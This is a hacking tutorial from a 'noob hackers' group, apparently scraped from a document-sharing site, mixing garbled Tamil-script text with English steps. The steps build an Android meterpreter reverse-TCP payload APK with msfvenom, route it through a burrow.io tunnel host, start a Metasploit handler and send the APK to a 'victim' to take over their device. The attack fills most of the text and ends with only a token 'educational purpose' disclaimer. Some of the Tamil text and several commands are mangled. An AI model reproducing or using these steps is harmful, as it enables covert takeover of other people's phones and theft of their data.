Metaspolit Handbook

Download as pdf or txt
Download as pdf or txt
You are on page 1of 10

noob hackers

வண க ேதாழ கேள நா ைந ேரா ...


இ ேஹ க
ேசன இ
நா க ஆ ரா சாதன ைத
ேஹ ெச ய ேபாக ேறா .

- Android சாதன ைத ேஹ க
ெச த -
ெட ம ஆ ரா ெதாட க
ந ப ெம டா ேளாய -
ஃ ேர ெவா க
ஆ ரா ைட ேஹ க ெச த

--- ெட ம ஆ ரா ைட
ேஹ க ெச noob
வ hackers
---

So guy's today we are going to hack


android device over wan (wide area
network) so come on let's get started...

So follow this....

# Follow below steps

1. First of all install termux and update it

2. Install metasploit-franework in your


termux by searching m-wiz tool in
YouTube. So after that install it.
3. Now ooen chrome and visit burrow.io
website and login into it by real gmail and
different password. and verify the login
details in gmail.

4. After the login and verify get's done


come into the page of burrow.io and at
right side of the page click on 3 dots and
after that a menu appears in that click on
tunnels and then click on create tunnel
after clicking on that a new window opens
in that search for FORWARD TCP PORT
FOR YOUR LOCAL HOST. Then select it
noobmenu
below that a small hackers
opens when you
scroll down in that fill the boxes so first
click on Local Host Port and a small
manu opens in that just scroll down and
click on Custom TCP port after that in
custom tcp pirt area apply any nunber
which you like in empty area (26772) this
is example.. So after that click on Create
Tunnel. After that a new window opens
and a message appears that the tunnel
has been activated.

5. Now in that same page scroll down and


a link will appear copy that link
ex :- Curl -Ls etc...
6. Now below that link a port is showing
like this ( see example) also copy this one
somewhere.

ex :- io.burrow.io:6282

7. After doing all come back to termux


and apply command's step by step as i
followed.

A) ./msfvenom -p android/meterpreter/
reverse_tcp LHOST=io.burrow.io
LPORT=(your port number which you
noob hackers
copied) R > /sdcard/noob.apk

ex:- ./msfvenom -p android/meterpreter/


reverse_tcp LHOST=io.burrow.io
LPORT=26772 R > /sdcard/noob.apk

B) Now open termux and apply these


commands.

$ ls

$ cd metasploit-franework

$ ./msfvenom -p android/meterpreter/
reverse_tcp LHOST=io.burrow.io
LPORT=26772 R > /sdcard/noob.apk

Now the payload generates so wait for it


to complete....

C) After the payload generated now apply


below commands.

$ ls

$ cd metasploit-franework

$ ls

noob hackers
$ ./msfconsole

Now the metasploit is starting so wait for


it to start....after that metasploit starts
now comeback to your file explorer and
check if the payload is generated or not.....
(the payload is a green coloured
application) If it is present then it's good...

D) Now come back to termux and open


new session and apply below commands
step by step..

$ mkdir -p $PREFIX/var/lib/postgresql
$ initdb $PREFIX/var/lib/postgresql

$ pg_ctl -D $PREFIX/var/lib/postgresql
start

$ create msf database

Now all things are set perfectly...so come


on let's goa ahead...

E) Now open the another new session and


apply this command

$ pkg install open ssh


noob hackers
F) Now open the burrow.io and copy all
port number and links which i
mentioned ....in starting of pdf after that
open termux and open a new session and
paste your burrow.io tunnel link
in that session and click enter after that
the session starts...

G) now open the session of msfconsole


which you opened recently ...in that apply
these below commands step by step...

$ db_status
(this command is to check the status of
database if data base showing connected
then it's good if not then repeat this (D)
step...

$ use exploit/multi/handler

$ set payload android/meterpreter/


reverse_tcp

$ set lhost io.burrow.io

$ set lport (your port number)

$ exploit noob hackers

Now the meterpreter session starts and


now go to your file manager and share the
payload which you created with your
victim and come back to termux and in
msfconsole session...

H) Now finally you can see that the


session is started and now you can check
i mean hack your victim device data easily
without any issue by simply applying this
commands...
$ help

So whenever you want to hack your victim


just repeat the (D) and (G) steps that's
all.....

Note:- If the session died than you should


change tunnel or you need goo internet
connection and make sure that your
victims device is connected to
internet...So that's all

Theses method is only for educational


purpose.....wenoob hackers
are not responsible for any
such kind of illegal activity done by your
side....

எனேவ ைபய இ அ வள தா ,
உ க இ ப எ
ந க ேற ...

"நீ க ரி ெகா ள
ேபாரா க றீ க எ றா
க ப ன ேயாைவ
பா க "

------ எ கைள ச தா ெச த யத
ந ற -------
எ க YouTube அத கார வ ேசன :
-
https://youtu.be/vLLLBGd-Elg

எ க FB :-
https://www.facebook.com/groups
/1936478173310085

எ க வைல தள : -
https://www.noob-hackers.com

------ ைப ஒ ந ல ேஹ க நா ----
எ க ேசன அைன ேஹ க
உதவ ற noob hackers
கைள வழ கற
&
த தர க ம பய ச க
இலவசமாக ... எனேவ எ களிடமி
இலவச ந ைமகைள ெபற எ கைள
ேசர ....

#Noobhackers
#noobhackers
#hacking
எ க ேசன இ ேபா ப . .எஃ -ஐ
வழ கற
5+ ேம ப ட ெமாழிக ....
ேஹ க ைக அ பவ க

noob hackers

You might also like